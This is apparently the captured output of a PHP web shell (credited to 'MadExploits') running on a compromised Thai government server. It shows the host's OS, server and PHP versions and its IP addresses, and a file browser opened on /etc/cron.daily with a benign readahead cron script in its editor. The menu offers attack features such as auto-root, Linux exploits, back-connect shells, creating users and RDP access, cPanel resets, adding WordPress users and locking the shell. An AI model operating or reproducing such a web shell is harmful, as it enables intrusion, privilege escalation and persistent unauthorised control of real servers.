Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
cron.daily /
[ HOME SHELL ]
Name
Size
Permission
Action
00webalizer
133
B
-rwxr-xr-x
certwatch
2.19
KB
-rwxr-xr-x
cups
118
B
-rwx------
logrotate
180
B
-rwx------
makewhatis.cron
927
B
-rwx------
mlocate.cron
189
B
-rwx------
readahead.cron
563
B
-rwxr-xr-x
tmpwatch
433
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readahead.cron
#!/bin/bash # # Generates sorted readahead files # # Copyright (C) 2007 Red Hat, Inc. # Karel Zak <kzak@redhat.com> # renice +19 -p $$ >/dev/null 2>&1 ionice -c3 -p $$ >/dev/null 2>&1 TYPES="early later" READAHEAD_CMD="/sbin/readahead" READAHEAD_BASE="/var/lib/readahead" for LTYPE in $TYPES; do if [ -s "$READAHEAD_BASE/custom.$LTYPE" ]; then FLS="$READAHEAD_BASE/custom.$LTYPE" else FLS=$(ls $READAHEAD_BASE/*.$LTYPE 2>/dev/null ) fi if [ -n "$FLS" ]; then $READAHEAD_CMD --sort --output=$READAHEAD_BASE/$LTYPE.sorted $FLS &>/dev/null fi done
Close